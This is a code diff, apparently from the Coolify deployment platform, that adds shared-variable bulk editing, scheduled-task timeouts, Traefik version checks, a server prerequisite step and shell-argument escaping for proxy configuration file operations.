+ // Get project variables if we have a project_uuid in route + $projectUuid = data_get($this->parameters, 'project_uuid'); + if ($projectUuid) { + $project = Project::where('team_id', $team->id) + ->where('uuid', $projectUuid) + ->first(); + + if ($project) { + try { + $this->authorize('view', $project); + $result['project'] = $project->environment_variables() + ->pluck('key') + ->toArray(); + + // Get environment variables if we have an environment_uuid in route + $environmentUuid = data_get($this->parameters, 'environment_uuid'); + if ($environmentUuid) { + $environment = $project->environments() + ->where('uuid', $environmentUuid) + ->first(); + + if ($environment) { + try { + $this->authorize('view', $environment); + $result['environment'] = $environment->environment_variables() + ->pluck('key') + ->toArray(); + } catch (\Illuminate\Auth\Access\AuthorizationException $e) { + // User not authorized to view environment variables + } + } + } + } catch (\Illuminate\Auth\Access\AuthorizationException $e) { + // User not authorized to view project variables + } + } + } + + return $result; + } + public function submit() { $this->validate(); diff --git a/app/Livewire/Project/Shared/EnvironmentVariable/Show.php b/app/Livewire/Project/Shared/EnvironmentVariable/Show.php index 3b8d244cc..2030f631e 100644 --- a/app/Livewire/Project/Shared/EnvironmentVariable/Show.php +++ b/app/Livewire/Project/Shared/EnvironmentVariable/Show.php @@ -2,11 +2,14 @@ namespace App\Livewire\Project\Shared\EnvironmentVariable; +use App\Models\Environment; use App\Models\EnvironmentVariable as ModelsEnvironmentVariable; +use App\Models\Project; use App\Models\SharedEnvironmentVariable; use App\Traits\EnvironmentVariableAnalyzer; use App\Traits\EnvironmentVariableProtection; use Illuminate\Foundation\Auth\Access\AuthorizesRequests; +use Livewire\Attributes\Computed; use Livewire\Component; class Show extends Component @@ -184,6 +187,7 @@ public function submit() $this->serialize(); $this->syncData(true); + $this->syncData(false); $this->dispatch('success', 'Environment variable updated.'); $this->dispatch('envsUpdated'); $this->dispatch('configurationChanged'); @@ -192,6 +196,72 @@ public function submit() } } + #[Computed] + public function availableSharedVariables(): array + { + $team = currentTeam(); + $result = [ + 'team' => [], + 'project' => [], + 'environment' => [], + ]; + + // Early return if no team + if (! $team) { + return $result; + } + + // Check if user can view team variables + try { + $this->authorize('view', $team); + $result['team'] = $team->environment_variables() + ->pluck('key') + ->toArray(); + } catch (\Illuminate\Auth\Access\AuthorizationException $e) { + // User not authorized to view team variables + } + + // Get project variables if we have a project_uuid in route + $projectUuid = data_get($this->parameters, 'project_uuid'); + if ($projectUuid) { + $project = Project::where('team_id', $team->id) + ->where('uuid', $projectUuid) + ->first(); + + if ($project) { + try { + $this->authorize('view', $project); + $result['project'] = $project->environment_variables() + ->pluck('key') + ->toArray(); + + // Get environment variables if we have an environment_uuid in route + $environmentUuid = data_get($this->parameters, 'environment_uuid'); + if ($environmentUuid) { + $environment = $project->environments() + ->where('uuid', $environmentUuid) + ->first(); + + if ($environment) { + try { + $this->authorize('view', $environment); + $result['environment'] = $environment->environment_variables() + ->pluck('key') + ->toArray(); + } catch (\Illuminate\Auth\Access\AuthorizationException $e) { + // User not authorized to view environment variables + } + } + } + } catch (\Illuminate\Auth\Access\AuthorizationException $e) { + // User not authorized to view project variables + } + } + } + + return $result; + } + public function delete() { try { diff --git a/app/Livewire/Project/Shared/ScheduledTask/Add.php b/app/Livewire/Project/Shared/ScheduledTask/Add.php index e4b666532..d7210c15d 100644 --- a/app/Livewire/Project/Shared/ScheduledTask/Add.php +++ b/app/Livewire/Project/Shared/ScheduledTask/Add.php @@ -34,11 +34,14 @@ class Add extends Component public ?string $container = ''; + public int $timeout = 300; + protected $rules = [ 'name' => 'required|string', 'command' => 'required|string', 'frequency' => 'required|string', 'container' => 'nullable|string', + 'timeout' => 'required|integer|min:60|max:3600', ]; protected $validationAttributes = [ @@ -46,6 +49,7 @@ class Add extends Component 'command' => 'command', 'frequency' => 'frequency', 'container' => 'container', + 'timeout' => 'timeout', ]; public function mount() @@ -103,6 +107,7 @@ public function saveScheduledTask() $task->command = $this->command; $task->frequency = $this->frequency; $task->container = $this->container; + $task->timeout = $this->timeout; $task->team_id = currentTeam()->id; switch ($this->type) { @@ -130,5 +135,6 @@ public function clear() $this->command = ''; $this->frequency = ''; $this->container = ''; + $this->timeout = 300; } } diff --git a/app/Livewire/Project/Shared/ScheduledTask/Show.php b/app/Livewire/Project/Shared/ScheduledTask/Show.php index c8d07ae36..088de0a76 100644 --- a/app/Livewire/Project/Shared/ScheduledTask/Show.php +++ b/app/Livewire/Project/Shared/ScheduledTask/Show.php @@ -40,6 +40,9 @@ class Show extends Component #[Validate(['string', 'nullable'])] public ?string $container = null; + #[Validate(['integer', 'required', 'min:60', 'max:3600'])] + public $timeout = 300; + #[Locked] public ?string $application_uuid; @@ -99,6 +102,7 @@ public function syncData(bool $toModel = false) $this->task->command = str($this->command)->trim()->value(); $this->task->frequency = str($this->frequency)->trim()->value(); $this->task->container = str($this->container)->trim()->value(); + $this->task->timeout = (int) $this->timeout; $this->task->save(); } else { $this->isEnabled = $this->task->enabled; @@ -106,6 +110,7 @@ public function syncData(bool $toModel = false) $this->command = $this->task->command; $this->frequency = $this->task->frequency; $this->container = $this->task->container; + $this->timeout = $this->task->timeout ?? 300; } } diff --git a/app/Livewire/Server/Navbar.php b/app/Livewire/Server/Navbar.php index 6baa54672..4e3481912 100644 --- a/app/Livewire/Server/Navbar.php +++ b/app/Livewire/Server/Navbar.php @@ -5,7 +5,8 @@ use App\Actions\Proxy\CheckProxy; use App\Actions\Proxy\StartProxy; use App\Actions\Proxy\StopProxy; -use App\Jobs\RestartProxyJob; +use App\Enums\ProxyTypes; +use App\Jobs\CheckTraefikVersionForServerJob; use App\Models\Server; use App\Services\ProxyDashboardCacheService; use Illuminate\Foundation\Auth\Access\AuthorizesRequests; @@ -61,7 +62,18 @@ public function restart() { try { $this->authorize('manageProxy', $this->server); - RestartProxyJob::dispatch($this->server); + StopProxy::run($this->server, restarting: true); + + $this->server->proxy->force_stop = false; + $this->server->save(); + + $activity = StartProxy::run($this->server, force: true, restarting: true); + $this->dispatch('activityMonitor', $activity->id); + + // Check Traefik version after restart to provide immediate feedback + if ($this->server->proxyType() === ProxyTypes::TRAEFIK->value) { + CheckTraefikVersionForServerJob::dispatch($this->server, get_traefik_versions()); + } } catch (\Throwable $e) { return handleError($e, $this); } @@ -118,19 +130,25 @@ public function checkProxyStatus() public function showNotification() { + $previousStatus = $this->proxyStatus; $this->server->refresh(); $this->proxyStatus = $this->server->proxy->status ?? 'unknown'; switch ($this->proxyStatus) { case 'running': $this->loadProxyConfiguration(); - $this->dispatch('success', 'Proxy is running.'); - break; - case 'restarting': - $this->dispatch('info', 'Initiating proxy restart.'); + // Only show "Proxy is running" notification when transitioning from a stopped/error state + // Don't show during normal start/restart flows (starting, restarting, stopping) + if (in_array($previousStatus, ['exited', 'stopped', 'unknown', null])) { + $this->dispatch('success', 'Proxy is running.'); + } break; case 'exited': - $this->dispatch('info', 'Proxy has exited.'); + // Only show "Proxy has exited" notification when transitioning from running state + // Don't show during normal stop/restart flows (stopping, restarting) + if (in_array($previousStatus, ['running'])) { + $this->dispatch('info', 'Proxy has exited.'); + } break; case 'stopping': $this->dispatch('info', 'Proxy is stopping.'); @@ -154,6 +172,22 @@ public function refreshServer() $this->server->load('settings'); } + /** + * Check if Traefik has any outdated version info (patch or minor upgrade). + * This shows a warning indicator in the navbar. + */ + public function getHasTraefikOutdatedProperty(): bool + { + if ($this->server->proxyType() !== ProxyTypes::TRAEFIK->value) { + return false; + } + + // Check if server has outdated info stored + $outdatedInfo = $this->server->traefik_outdated_info; + + return ! empty($outdatedInfo) && isset($outdatedInfo['type']); + } + public function render() { return view('livewire.server.navbar'); diff --git a/app/Livewire/Server/Proxy.php b/app/Livewire/Server/Proxy.php index bc7e9bde4..49d872210 100644 --- a/app/Livewire/Server/Proxy.php +++ b/app/Livewire/Server/Proxy.php @@ -4,6 +4,7 @@ use App\Actions\Proxy\GetProxyConfiguration; use App\Actions\Proxy\SaveProxyConfiguration; +use App\Enums\ProxyTypes; use App\Models\Server; use Illuminate\Foundation\Auth\Access\AuthorizesRequests; use Livewire\Component; @@ -24,6 +25,12 @@ class Proxy extends Component public bool $generateExactLabels = false; + /** + * Cache the versions.json file data in memory for this component instance. + * This avoids multiple file reads during a single request/render cycle. + */ + protected ?array $cachedVersionsFile = null; + public function getListeners() { $teamId = auth()->user()->currentTeam()->id; @@ -55,9 +62,37 @@ private function syncData(bool $toModel = false): void } } - public function getConfigurationFilePathProperty() + /** + * Get Traefik versions from cached data with in-memory optimization. + * Returns array like: ['v3.5' => '3.5.6', 'v3.6' => '3.6.2'] + * + * This method adds an in-memory cache layer on top of the global + * get_traefik_versions() helper to avoid multiple calls during + * a single component lifecycle/render. + */ + protected function getTraefikVersions(): ?array { - return $this->server->proxyPath().'docker-compose.yml'; + // In-memory cache for this component instance (per-request) + if ($this->cachedVersionsFile !== null) { + return data_get($this->cachedVersionsFile, 'traefik'); + } + + // Load from global cached helper (Redis + filesystem) + $versionsData = get_versions_data(); + $this->cachedVersionsFile = $versionsData; + + if (! $versionsData) { + return null; + } + + $traefikVersions = data_get($versionsData, 'traefik'); + + return is_array($traefikVersions) ? $traefikVersions : null; + } + + public function getConfigurationFilePathProperty(): string + { + return rtrim($this->server->proxyPath(), '/') . '/docker-compose.yml'; } public function changeProxy() @@ -144,4 +179,131 @@ public function loadProxyConfiguration() return handleError($e, $this); } } + + /** + * Get the latest Traefik version for this server's current branch. + * + * This compares the server's detected version against available versions + * in versions.json to determine the latest patch for the current branch, + * or the newest available version if no current version is detected. + */ + public function getLatestTraefikVersionProperty(): ?string + { + try { + $traefikVersions = $this->getTraefikVersions(); + + if (! $traefikVersions) { + return null; + } + + // Get this server's current version + $currentVersion = $this->server->detected_traefik_version; + + // If we have a current version, try to find matching branch + if ($currentVersion && $currentVersion !== 'latest') { + $current = ltrim($currentVersion, 'v'); + if (preg_match('/^(\d+\.\d+)/', $current, $matches)) { + $branch = "v{$matches[1]}"; + if (isset($traefikVersions[$branch])) { + $version = $traefikVersions[$branch]; + + return str_starts_with($version, 'v') ? $version : "v{$version}"; + } + } + } + + // Return the newest available version + $newestVersion = collect($traefikVersions) + ->map(fn ($v) => ltrim($v, 'v')) + ->sortBy(fn ($v) => $v, SORT_NATURAL) + ->last(); + + return $newestVersion ? "v{$newestVersion}" : null; + } catch (\Throwable $e) { + return null; + } + } + + public function getIsTraefikOutdatedProperty(): bool + { + if ($this->server->proxyType() !== ProxyTypes::TRAEFIK->value) { + return false; + } + + $currentVersion = $this->server->detected_traefik_version; + if (! $currentVersion || $currentVersion === 'latest') { + return false; + } + + $latestVersion = $this->latestTraefikVersion; + if (! $latestVersion) { + return false; + } + + // Compare versions (strip 'v' prefix) + $current = ltrim($currentVersion, 'v'); + $latest = ltrim($latestVersion, 'v'); + + return version_compare($current, $latest, '<'); + } + + /** + * Check if a newer Traefik branch (minor version) is available for this server. + * Returns the branch identifier (e.g., "v3.6") if a newer branch exists. + */ + public function getNewerTraefikBranchAvailableProperty(): ?string + { + try { + if ($this->server->proxyType() !== ProxyTypes::TRAEFIK->value) { + return null; + } + + // Get this server's current version + $currentVersion = $this->server->detected_traefik_version; + if (! $currentVersion || $currentVersion === 'latest') { + return null; + } + + // Check if we have outdated info stored for this server (faster than computing) + $outdatedInfo = $this->server->traefik_outdated_info; + if ($outdatedInfo && isset($outdatedInfo['type']) && $outdatedInfo['type'] === 'minor_upgrade') { + // Use the upgrade_target field if available (e.g., "v3.6") + if (isset($outdatedInfo['upgrade_target'])) { + return str_starts_with($outdatedInfo['upgrade_target'], 'v') + ? $outdatedInfo['upgrade_target'] + : "v{$outdatedInfo['upgrade_target']}"; + } + } + + // Fallback: compute from cached versions data + $traefikVersions = $this->getTraefikVersions(); + + if (! $traefikVersions) { + return null; + } + + // Extract current branch (e.g., "3.5" from "3.5.6") + $current = ltrim($currentVersion, 'v'); + if (! preg_match('/^(\d+\.\d+)/', $current, $matches)) { + return null; + } + + $currentBranch = $matches[1]; + + // Find the newest branch that's greater than current + $newestBranch = null; + foreach ($traefikVersions as $branch => $version) { + $branchNum = ltrim($branch, 'v'); + if (version_compare($branchNum, $currentBranch, '>')) { + if (! $newestBranch || version_compare($branchNum, $newestBranch, '>')) { + $newestBranch = $branchNum; + } + } + } + + return $newestBranch ? "v{$newestBranch}" : null; + } catch (\Throwable $e) { + return null; + } + } } diff --git a/app/Livewire/Server/Proxy/DynamicConfigurationNavbar.php b/app/Livewire/Server/Proxy/DynamicConfigurationNavbar.php index f377bbeb9..c67591cf5 100644 --- a/app/Livewire/Server/Proxy/DynamicConfigurationNavbar.php +++ b/app/Livewire/Server/Proxy/DynamicConfigurationNavbar.php @@ -25,13 +25,25 @@ public function delete(string $fileName) $this->authorize('update', $this->server); $proxy_path = $this->server->proxyPath(); $proxy_type = $this->server->proxyType(); + + // Decode filename: pipes are used to encode dots for Livewire property binding + // (e.g., 'my|service.yaml' -> 'my.service.yaml') + // This must happen BEFORE validation because validateShellSafePath() correctly + // rejects pipe characters as dangerous shell metacharacters $file = str_replace('|', '.', $fileName); + + // Validate filename to prevent command injection + validateShellSafePath($file, 'proxy configuration filename'); + if ($proxy_type === 'CADDY' && $file === 'Caddyfile') { $this->dispatch('error', 'Cannot delete Caddyfile.'); return; } - instant_remote_process(["rm -f {$proxy_path}/dynamic/{$file}"], $this->server); + + $fullPath = "{$proxy_path}/dynamic/{$file}"; + $escapedPath = escapeshellarg($fullPath); + instant_remote_process(["rm -f {$escapedPath}"], $this->server); if ($proxy_type === 'CADDY') { $this->server->reloadCaddy(); } diff --git a/app/Livewire/Server/Proxy/NewDynamicConfiguration.php b/app/Livewire/Server/Proxy/NewDynamicConfiguration.php index eb2db1cbb..baf7b6b50 100644 --- a/app/Livewire/Server/Proxy/NewDynamicConfiguration.php +++ b/app/Livewire/Server/Proxy/NewDynamicConfiguration.php @@ -41,6 +41,10 @@ public function addDynamicConfiguration() 'fileName' => 'required', 'value' => 'required', ]); + + // Validate filename to prevent command injection + validateShellSafePath($this->fileName, 'proxy configuration filename'); + if (data_get($this->parameters, 'server_uuid')) { $this->server = Server::ownedByCurrentTeam()->whereUuid(data_get($this->parameters, 'server_uuid'))->first(); } @@ -65,8 +69,10 @@ public function addDynamicConfiguration() } $proxy_path = $this->server->proxyPath(); $file = "{$proxy_path}/dynamic/{$this->fileName}"; + $escapedFile = escapeshellarg($file); + if ($this->newFile) { - $exists = instant_remote_process(["test -f $file && echo 1 || echo 0"], $this->server); + $exists = instant_remote_process(["test -f {$escapedFile} && echo 1 || echo 0"], $this->server); if ($exists == 1) { $this->dispatch('error', 'File already exists'); @@ -80,7 +86,7 @@ public function addDynamicConfiguration() } $base64_value = base64_encode($this->value); instant_remote_process([ - "echo '{$base64_value}' | base64 -d | tee {$file} > /dev/null", + "echo '{$base64_value}' | base64 -d | tee {$escapedFile} > /dev/null", ], $this->server); if ($proxy_type === 'CADDY') { $this->server->reloadCaddy(); diff --git a/app/Livewire/Server/ValidateAndInstall.php b/app/Livewire/Server/ValidateAndInstall.php index bbd7f3dd9..1a5bd381b 100644 --- a/app/Livewire/Server/ValidateAndInstall.php +++ b/app/Livewire/Server/ValidateAndInstall.php @@ -25,6 +25,8 @@ class ValidateAndInstall extends Component public $supported_os_type = null; + public $prerequisites_installed = null; + public $docker_installed = null; public $docker_compose_installed = null; @@ -33,12 +35,15 @@ class ValidateAndInstall extends Component public $error = null; + public string $installationStep = 'Prerequisites'; + public bool $ask = false; protected $listeners = [ 'init', 'validateConnection', 'validateOS', + 'validatePrerequisites', 'validateDockerEngine', 'validateDockerVersion', 'refresh' => '$refresh', @@ -48,6 +53,7 @@ public function init(int $data = 0) { $this->uptime = null; $this->supported_os_type = null; + $this->prerequisites_installed = null; $this->docker_installed = null; $this->docker_version = null; $this->docker_compose_installed = null; @@ -69,6 +75,7 @@ public function retry() $this->authorize('update', $this->server); $this->uptime = null; $this->supported_os_type = null; + $this->prerequisites_installed = null; $this->docker_installed = null; $this->docker_compose_installed = null; $this->docker_version = null; @@ -103,6 +110,43 @@ public function validateOS() return; } + $this->dispatch('validatePrerequisites'); + } + + public function validatePrerequisites() + { + $validationResult = $this->server->validatePrerequisites(); + $this->prerequisites_installed = $validationResult['success']; + if (! $validationResult['success']) { + if ($this->install) { + if ($this->number_of_tries == $this->max_tries) { + $missingCommands = implode(', ', $validationResult['missing']); + $this->error = "Prerequisites ({$missingCommands}) could not be installed. Please install them manually before continuing."; + $this->server->update([ + 'validation_logs' => $this->error, + ]); + + return; + } else { + if ($this->number_of_tries <= $this->max_tries) { + $this->installationStep = 'Prerequisites'; + $activity = $this->server->installPrerequisites(); + $this->number_of_tries++; + $this->dispatch('activityMonitor', $activity->id, 'init', $this->number_of_tries, "{$this->installationStep} Installation Logs"); + } + + return; + } + } else { + $missingCommands = implode(', ', $validationResult['missing']); + $this->error = "Prerequisites ({$missingCommands}) are not installed. Please install them before continuing."; + $this->server->update([ + 'validation_logs' => $this->error, + ]); + + return; + } + } $this->dispatch('validateDockerEngine'); } @@ -121,9 +165,10 @@ public function validateDockerEngine() return; } else { if ($this->number_of_tries <= $this->max_tries) { + $this->installationStep = 'Docker'; $activity = $this->server->installDocker(); $this->number_of_tries++; - $this->dispatch('activityMonitor', $activity->id, 'init', $this->number_of_tries); + $this->dispatch('activityMonitor', $activity->id, 'init', $this->number_of_tries, "{$this->installationStep} Installation Logs"); } return; @@ -161,6 +206,9 @@ public function validateDockerVersion() if (! $proxyShouldRun) { return; } + // Ensure networks exist BEFORE dispatching async proxy startup + // This prevents race condition where proxy tries to start before networks are created + instant_remote_process(ensureProxyNetworksExist($this->server)->toArray(), $this->server, false); StartProxy::dispatch($this->server); } else { $requiredDockerVersion = str(config('constants.docker.minimum_required_version'))->before('.'); diff --git a/app/Livewire/Settings/Index.php b/app/Livewire/Settings/Index.php index 96f13b173..7a96eabb2 100644 --- a/app/Livewire/Settings/Index.php +++ b/app/Livewire/Settings/Index.php @@ -44,6 +44,8 @@ class Index extends Component public bool $forceSaveDomains = false; + public $buildActivityId = null; + public function render() { return view('livewire.settings.index'); @@ -151,4 +153,37 @@ public function submit() return handleError($e, $this); } } + + public function buildHelperImage() + { + try { + if (! isDev()) { + $this->dispatch('error', 'Building helper image is only available in development mode.'); + + return; + } + + $version = $this->dev_helper_version ?: config('constants.coolify.helper_version'); + if (empty($version)) { + $this->dispatch('error', 'Please specify a version to build.'); + + return; + } + + $buildCommand = "docker build -t ghcr.io/coollabsio/coolify-helper:{$version} -f docker/coolify-helper/Dockerfile ."; + + $activity = remote_process( + command: [$buildCommand], + server: $this->server, + type: 'build-helper-image' + ); + + $this->buildActivityId = $activity->id; + $this->dispatch('activityMonitor', $activity->id); + + $this->dispatch('success', "Building coolify-helper:{$version}..."); + } catch (\Exception $e) { + return handleError($e, $this); + } + } } diff --git a/app/Livewire/SharedVariables/Environment/Show.php b/app/Livewire/SharedVariables/Environment/Show.php index bee757a64..0bdc1503f 100644 --- a/app/Livewire/SharedVariables/Environment/Show.php +++ b/app/Livewire/SharedVariables/Environment/Show.php @@ -5,6 +5,7 @@ use App\Models\Application; use App\Models\Project; use Illuminate\Foundation\Auth\Access\AuthorizesRequests; +use Illuminate\Support\Facades\DB; use Livewire\Component; class Show extends Component @@ -19,7 +20,11 @@ class Show extends Component public array $parameters; - protected $listeners = ['refreshEnvs' => '$refresh', 'saveKey', 'environmentVariableDeleted' => '$refresh']; + public string $view = 'normal'; + + public ?string $variables = null; + + protected $listeners = ['refreshEnvs' => 'refreshEnvs', 'saveKey', 'environmentVariableDeleted' => 'refreshEnvs']; public function saveKey($data) { @@ -39,6 +44,7 @@ public function saveKey($data) 'team_id' => currentTeam()->id, ]); $this->environment->refresh(); + $this->getDevView(); } catch (\Throwable $e) { return handleError($e, $this); } @@ -49,6 +55,120 @@ public function mount() $this->parameters = get_route_parameters(); $this->project = Project::ownedByCurrentTeam()->where('uuid', request()->route('project_uuid'))->firstOrFail(); $this->environment = $this->project->environments()->where('uuid', request()->route('environment_uuid'))->firstOrFail(); + $this->getDevView(); + } + + public function switch() + { + $this->authorize('view', $this->environment); + $this->view = $this->view === 'normal' ? 'dev' : 'normal'; + $this->getDevView(); + } + + public function getDevView() + { + $this->variables = $this->formatEnvironmentVariables($this->environment->environment_variables->sortBy('key')); + } + + private function formatEnvironmentVariables($variables) + { + return $variables->map(function ($item) { + if ($item->is_shown_once) { + return "$item->key=(Locked Secret, delete and add again to change)"; + } + if ($item->is_multiline) { + return "$item->key=(Multiline environment variable, edit in normal view)"; + } + + return "$item->key=$item->value"; + })->join("\n"); + } + + public function submit() + { + try { + $this->authorize('update', $this->environment); + $this->handleBulkSubmit(); + $this->getDevView(); + } catch (\Throwable $e) { + return handleError($e, $this); + } finally { + $this->refreshEnvs(); + } + } + + private function handleBulkSubmit() + { + $variables = parseEnvFormatToArray($this->variables); + $changesMade = false; + + DB::transaction(function () use ($variables, &$changesMade) { + // Delete removed variables + $deletedCount = $this->deleteRemovedVariables($variables); + if ($deletedCount > 0) { + $changesMade = true; + } + + // Update or create variables + $updatedCount = $this->updateOrCreateVariables($variables); + if ($updatedCount > 0) { + $changesMade = true; + } + }); + + // Only dispatch success after transaction has committed + if ($changesMade) { + $this->dispatch('success', 'Environment variables updated.'); + } + } + + private function deleteRemovedVariables($variables) + { + $variablesToDelete = $this->environment->environment_variables()->whereNotIn('key', array_keys($variables))->get(); + + if ($variablesToDelete->isEmpty()) { + return 0; + } + + $this->environment->environment_variables()->whereNotIn('key', array_keys($variables))->delete(); + + return $variablesToDelete->count(); + } + + private function updateOrCreateVariables($variables) + { + $count = 0; + foreach ($variables as $key => $value) { + $found = $this->environment->environment_variables()->where('key', $key)->first(); + + if ($found) { + if (! $found->is_shown_once && ! $found->is_multiline) { + if ($found->value !== $value) { + $found->value = $value; + $found->save(); + $count++; + } + } + } else { + $this->environment->environment_variables()->create([ + 'key' => $key, + 'value' => $value, + 'is_multiline' => false, + 'is_literal' => false, + 'type' => 'environment', + 'team_id' => currentTeam()->id, + ]); + $count++; + } + } + + return $count; + } + + public function refreshEnvs() + { + $this->environment->refresh(); + $this->getDevView(); } public function render() diff --git a/app/Livewire/SharedVariables/Project/Show.php b/app/Livewire/SharedVariables/Project/Show.php index 712a9960b..b205ea1ec 100644 --- a/app/Livewire/SharedVariables/Project/Show.php +++ b/app/Livewire/SharedVariables/Project/Show.php @@ -4,6 +4,7 @@ use App\Models\Project; use Illuminate\Foundation\Auth\Access\AuthorizesRequests; +use Illuminate\Support\Facades\DB; use Livewire\Component; class Show extends Component @@ -12,7 +13,11 @@ class Show extends Component public Project $project; - protected $listeners = ['refreshEnvs' => '$refresh', 'saveKey' => 'saveKey', 'environmentVariableDeleted' => '$refresh']; + public string $view = 'normal'; + + public ?string $variables = null; + + protected $listeners = ['refreshEnvs' => 'refreshEnvs', 'saveKey' => 'saveKey', 'environmentVariableDeleted' => 'refreshEnvs']; public function saveKey($data) { @@ -32,6 +37,7 @@ public function saveKey($data) 'team_id' => currentTeam()->id, ]); $this->project->refresh(); + $this->getDevView(); } catch (\Throwable $e) { return handleError($e, $this); } @@ -46,6 +52,114 @@ public function mount() return redirect()->route('dashboard'); } $this->project = $project; + $this->getDevView(); + } + + public function switch() + { + $this->authorize('view', $this->project); + $this->view = $this->view === 'normal' ? 'dev' : 'normal'; + $this->getDevView(); + } + + public function getDevView() + { + $this->variables = $this->formatEnvironmentVariables($this->project->environment_variables->sortBy('key')); + } + + private function formatEnvironmentVariables($variables) + { + return $variables->map(function ($item) { + if ($item->is_shown_once) { + return "$item->key=(Locked Secret, delete and add again to change)"; + } + if ($item->is_multiline) { + return "$item->key=(Multiline environment variable, edit in normal view)"; + } + + return "$item->key=$item->value"; + })->join("\n"); + } + + public function submit() + { + try { + $this->authorize('update', $this->project); + $this->handleBulkSubmit(); + $this->getDevView(); + } catch (\Throwable $e) { + return handleError($e, $this); + } finally { + $this->refreshEnvs(); + } + } + + private function handleBulkSubmit() + { + $variables = parseEnvFormatToArray($this->variables); + + $changesMade = DB::transaction(function () use ($variables) { + // Delete removed variables + $deletedCount = $this->deleteRemovedVariables($variables); + + // Update or create variables + $updatedCount = $this->updateOrCreateVariables($variables); + + return $deletedCount > 0 || $updatedCount > 0; + }); + + if ($changesMade) { + $this->dispatch('success', 'Environment variables updated.'); + } + } + + private function deleteRemovedVariables($variables) + { + $variablesToDelete = $this->project->environment_variables()->whereNotIn('key', array_keys($variables))->get(); + + if ($variablesToDelete->isEmpty()) { + return 0; + } + + $this->project->environment_variables()->whereNotIn('key', array_keys($variables))->delete(); + + return $variablesToDelete->count(); + } + + private function updateOrCreateVariables($variables) + { + $count = 0; + foreach ($variables as $key => $value) { + $found = $this->project->environment_variables()->where('key', $key)->first(); + + if ($found) { + if (! $found->is_shown_once && ! $found->is_multiline) { + if ($found->value !== $value) { + $found->value = $value; + $found->save(); + $count++; + } + } + } else { + $this->project->environment_variables()->create([ + 'key' => $key, + 'value' => $value, + 'is_multiline' => false, + 'is_literal' => false, + 'type' => 'project', + 'team_id' => currentTeam()->id, + ]); + $count++; + } + } + + return $count; + } + + public function refreshEnvs() + { + $this->project->refresh(); + $this->getDevView(); } public function render() diff --git a/app/Livewire/SharedVariables/Team/Index.php b/app/Livewire/SharedVariables/Team/Index.php index 82473528c..e420686f0 100644 --- a/app/Livewire/SharedVariables/Team/Index.php +++ b/app/Livewire/SharedVariables/Team/Index.php @@ -4,6 +4,7 @@ use App\Models\Team; use Illuminate\Foundation\Auth\Access\AuthorizesRequests; +use Illuminate\Support\Facades\DB; use Livewire\Component; class Index extends Component @@ -12,7 +13,11 @@ class Index extends Component public Team $team; - protected $listeners = ['refreshEnvs' => '$refresh', 'saveKey' => 'saveKey', 'environmentVariableDeleted' => '$refresh']; + public string $view = 'normal'; + + public ?string $variables = null; + + protected $listeners = ['refreshEnvs' => 'refreshEnvs', 'saveKey' => 'saveKey', 'environmentVariableDeleted' => 'refreshEnvs']; public function saveKey($data) { @@ -32,6 +37,7 @@ public function saveKey($data) 'team_id' => currentTeam()->id, ]); $this->team->refresh(); + $this->getDevView(); } catch (\Throwable $e) { return handleError($e, $this); } @@ -40,6 +46,119 @@ public function saveKey($data) public function mount() { $this->team = currentTeam(); + $this->getDevView(); + } + + public function switch() + { + $this->authorize('view', $this->team); + $this->view = $this->view === 'normal' ? 'dev' : 'normal'; + $this->getDevView(); + } + + public function getDevView() + { + $this->variables = $this->formatEnvironmentVariables($this->team->environment_variables->sortBy('key')); + } + + private function formatEnvironmentVariables($variables) + { + return $variables->map(function ($item) { + if ($item->is_shown_once) { + return "$item->key=(Locked Secret, delete and add again to change)"; + } + if ($item->is_multiline) { + return "$item->key=(Multiline environment variable, edit in normal view)"; + } + + return "$item->key=$item->value"; + })->join("\n"); + } + + public function submit() + { + try { + $this->authorize('update', $this->team); + $this->handleBulkSubmit(); + $this->getDevView(); + } catch (\Throwable $e) { + return handleError($e, $this); + } finally { + $this->refreshEnvs(); + } + } + + private function handleBulkSubmit() + { + $variables = parseEnvFormatToArray($this->variables); + $changesMade = false; + + DB::transaction(function () use ($variables, &$changesMade) { + // Delete removed variables + $deletedCount = $this->deleteRemovedVariables($variables); + if ($deletedCount > 0) { + $changesMade = true; + } + + // Update or create variables + $updatedCount = $this->updateOrCreateVariables($variables); + if ($updatedCount > 0) { + $changesMade = true; + } + }); + + if ($changesMade) { + $this->dispatch('success', 'Environment variables updated.'); + } + } + + private function deleteRemovedVariables($variables) + { + $variablesToDelete = $this->team->environment_variables()->whereNotIn('key', array_keys($variables))->get(); + + if ($variablesToDelete->isEmpty()) { + return 0; + } + + $this->team->environment_variables()->whereNotIn('key', array_keys($variables))->delete(); + + return $variablesToDelete->count(); + } + + private function updateOrCreateVariables($variables) + { + $count = 0; + foreach ($variables as $key => $value) { + $found = $this->team->environment_variables()->where('key', $key)->first(); + + if ($found) { + if (! $found->is_shown_once && ! $found->is_multiline) { + if ($found->value !== $value) { + $found->value = $value; + $found->save(); + $count++; + } + } + } else { + $this->team->environment_variables()->create([ + 'key' => $key, + 'value' => $value, + 'is_multiline' => false, + 'is_literal' => false, + 'type' => 'team', + 'team_id' => currentTeam()->id, + ]); + $count++; + } + } + + return $count; + } + + public function refreshEnvs() + { + $this->team->refresh(); + $this->getDevView(); } public function render() diff --git a/app/Livewire/Storage/Form.php b/app/Livewire/Storage/Form.php index d97550693..d101d7b58 100644 --- a/app/Livewire/Storage/Form.php +++ b/app/Livewire/Storage/Form.php @@ -120,9 +120,16 @@ public function testConnection() $this->storage->testConnection(shouldSave: true); + // Update component property to reflect the new validation status + $this->isUsable = $this->storage->is_usable; + return $this->dispatch('success', 'Connection is working.', 'Tested with "ListObjectsV2" action.'); } catch (\Throwable $e) { - $this->dispatch('error', 'Failed to create storage.', $e->getMessage()); + // Refresh model and sync to get the latest state + $this->storage->refresh(); + $this->isUsable = $this->storage->is_usable; + + $this->dispatch('error', 'Failed to test connection.', $e->getMessage()); } } diff --git a/app/Livewire/Storage/Show.php b/app/Livewire/Storage/Show.php index bdea9a3b0..fdf3d0d28 100644 --- a/app/Livewire/Storage/Show.php +++ b/app/Livewire/Storage/Show.php @@ -3,10 +3,13 @@ namespace App\Livewire\Storage; use App\Models\S3Storage; +use Illuminate\Foundation\Auth\Access\AuthorizesRequests; use Livewire\Component; class Show extends Component { + use AuthorizesRequests; + public $storage = null; public function mount() @@ -15,6 +18,7 @@ public function mount() if (! $this->storage) { abort(404); } + $this->authorize('view', $this->storage); } public function render() diff --git a/app/Models/Application.php b/app/Models/Application.php index 615e35f68..6e920f8e6 100644 --- a/app/Models/Application.php +++ b/app/Models/Application.php @@ -121,6 +121,8 @@ class Application extends BaseModel protected $casts = [ 'http_basic_auth_password' => 'encrypted', + 'restart_count' => 'integer', 